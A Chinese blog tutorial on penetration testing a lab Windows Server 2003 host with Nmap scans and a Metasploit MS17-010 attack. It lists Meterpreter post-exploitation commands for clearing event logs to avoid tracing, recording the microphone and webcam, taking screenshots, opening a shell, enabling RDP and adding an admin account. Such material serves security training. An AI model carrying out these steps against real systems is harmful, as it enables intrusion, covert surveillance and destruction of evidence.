渗透测试工具介绍与简单使用(一)

一、环境部署

1、攻击主机

        系统版本:Kali GNU/Linux Rolling

        内核版本: Linux 6.1.0-kali9-amd64

        架构        :x86-64

2、目标主机

        

二、Nmap工具 

1、介绍:

        nmap工具是Network Mapper的简称,是攻击主机自带一种扫描工具,Nmap可以检测目标机是否在线、端口开放情况、侦测运行的服务类型及版本信息、侦测操作系统与设备类型等信息。

2、用法与命令

        (1)查询当前网段存在的所有IP,结果如下图:

                命令:nmap -sP xxx.xxx.xxx.0/24

                

        (2)查看ip开放的端口情况:

                命令:nmap ip        (默认扫描端口1-1000)

                命令:nmap ip -p1-100        (扫描端口1-100)

                命令:nmap ip -p22,80,443,3306        (扫描指定端口)               

   

  

     

剩下的129是我们kali攻击机的IP地址。

        (3)端口服务扫描

                命令:nmap -sV ip -p22-8000

     

        (4)系统版本扫描

    

        是我们的目标主机win2003。

        (5)全扫描

                这个命令我们不常用,所以就不进行测试了

                命令:nmap -A 192.168.92.0/24

        (6)漏洞扫描

                命令:nmap --script=vuln ip

                

        到这里,我们利用nmap找到了目标系统可用的漏洞,下面将介绍msf工具来实施攻击。

三、MSF

        1、介绍:

                MSF :全称 (The Metasploit Framework) ,是渗透测试的一个神器 。kali自带。

        2、用法与命令

                (1)模块介绍:

1、Auxiliaries (辅助探测模块)

        该模块不会直接在测试者和目标主机建立访问,只负责进行扫描、嗅探、指纹识别等相关功能来获取信息用于辅佐测试者。

2、Exploit\run(漏洞利用模块)

        该模块利用目标主机存在的漏洞发起攻击。

3、Payload (攻击载荷模块)

        该模块是在渗透成功后保证可以使用命令控制目标主机。

4、Post(后渗透模块)

        该模块在可以控制目标主机的情况下进行后渗透行为,如获取敏感信息等。 

 5、Encoders(编码工具模块)

        该模块负责免杀,防止杀毒软件、防火墙、IDS等软件检测出来。

6、 evasion(混淆模块)

        该模块能够生成绕过杀毒软件的shell,目前只适用于windows系统

 7、Meterpreter (后续利用模块)

        该模块就是在攻击载荷溢出攻击成功以后返回给我们的控制通道。

                (2)渗透win2003 

第一步:kali进入MSF

        命令:msfconsole

        

根据漏洞扫描的结果,来利用漏洞,这里我们利用漏洞: ms17-010

第二步:搜索漏洞信息

        命令:search ms17-010

第三步:漏洞探测

        这里我们选择2来进行漏洞探测

        命令:

use 2
或者
use auxiliary/admin/smb/ms17_010_command
show options    #展示选项

 如图:

进行设置,如下图:

输入run开始执行,如下图:

 第四步:漏洞攻击

        使用1来进行攻击,先使用show options来查看需要我们填写的设置

        填写完毕后run执行,观察漏洞攻击是否从成功,如下图:

(3)控制win2003

        前文我么成功渗透2003,那我们就利用Meterpreter 来控制操作win2003:  

meterpreter利用

        1、lpwd             #显示当前主机的工作目录

        2、clearev          #清除目标主机的系统日志、安全日志等,避免被溯源

                 

        3、download/upload  #下载/上传文件(注意表示windows的目录要用\\)

                 

        4、execute -f xx -i #执行xx程序,-i参数表示与该程序进行交互,-H表示将窗口隐藏执行 execute -H -i -f cmd.exe

                

        5、getuid           #查看当前登录的账号 

                

        6、shell            #反弹shell,直接进入目标主机的命令行,与第4个执行结果相同

        7、search           #搜索文件

        8、record_mic       #开启麦克风

        9、webcam_list      #列出电脑上开启的摄像头

        10、webcam_snap -i 1 -v false #每隔1秒钟进行拍照

        11、screenshot         #对当前系统画面截图

                

                         ​​​           

        12、portfwd add -l 6666 -p 3389 -r 127.0.0.1    # 将目标机的3389端口转发到本地6666端口

        13、run post/windows/manage/enable_rdp          # 利用MSF的RDP模块开启3389端口

         rdesktop工具远程连接2003

                还记得在端口扫描时,检测到2003开放了3389端口吗,我们可以利用rdesktop来远程连接2003然后操控其桌面。

        没有该工具的,下载命令如下:

        sudo apt-get install rdesktop

        使用教程如下图:

        

可以现在meterpreter下创建一个账户(最好是管理员账户),然后在此页面登录。

        

  • 29
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值